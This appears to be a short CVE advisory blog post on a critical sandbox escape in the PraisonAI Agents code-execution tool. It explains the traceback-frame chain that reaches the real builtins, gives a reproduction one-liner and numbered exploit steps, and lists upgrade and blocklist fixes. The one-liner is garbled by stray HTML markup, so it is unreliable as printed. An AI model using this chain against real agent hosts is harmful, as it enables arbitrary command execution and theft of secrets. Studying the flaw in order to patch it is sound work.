PraisonAI Agents, Sandbox Escape, CVE-2026-39888 (Critical)

Listen to this Post

How this CVE works:

The `execute_code()` function defaults to sandbox_mode="sandbox", running user code in a subprocess with a restricted `__builtins__` dict and an AST-based blocklist. The subprocess wrapper’s `blocked_attrs` contains only 11 attribute names, missing key frame‑traversal attributes (__traceback__, tb_frame, f_back, f_builtins). By raising an exception, an attacker can chain `e.__traceback__.tb_frame.f_back.f_builtins` to reach the real `builtins` dictionary. From there, they retrieve `exec` and execute arbitrary commands, bypassing all sandbox layers. The AST blocklist does not block dot‑notation access, and `_safe_getattr` only intercepts explicit `getattr()` calls. The subprocess mode lacks the text‑pattern blocklist present in direct mode, making the escape trivial.

DailyCVE form:

Platform: praisonaiagents
Version: ≤1.5.113
Vulnerability: Sandbox escape
Severity: Critical (9.9)
date: 2026-04-08

Prediction: Already patched (1.5.115)

What Undercode Say:

Check installed version
pip show praisonaiagents
Reproduce the escape
python -c "from praisonaiagents.tools.python_tools import execute_code; print(execute_code('try: 1/0\nexcept Exception as e: exec(e.<strong>traceback</strong>.tb_frame.f_back.f_builtins[\"exec\"](\"import os; os.system('id')\"))'))"
Verify fix (≥1.5.115)
pip install praisonaiagents>=1.5.115

Exploit:

  1. Submit code that raises an exception (e.g., 1/0).
  2. Use `__traceback__` → `tb_frame` → `f_back` → f_builtins.

3. Retrieve `exec` as `_x = _p.f_builtins[“exec”]`.

  1. Execute arbitrary shell commands with _x("import subprocess; subprocess.check_output('id', shell=True)").

Protection from this CVE:

  • Upgrade to praisonaiagents ≥ 1.5.115.
  • Merge the full attribute blocklist (30+ entries) into the subprocess wrapper.
  • Add AST rules to block any attribute name starting with _.
  • Apply the text‑pattern blocklist to subprocess mode.
  • Avoid exposing `execute_code()` to untrusted input.

Impact:

Full host compromise: arbitrary command execution, file read/write (source, .env, SSH keys), environment variable exfiltration (API keys, secrets), and lateral movement via the host’s network stack.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top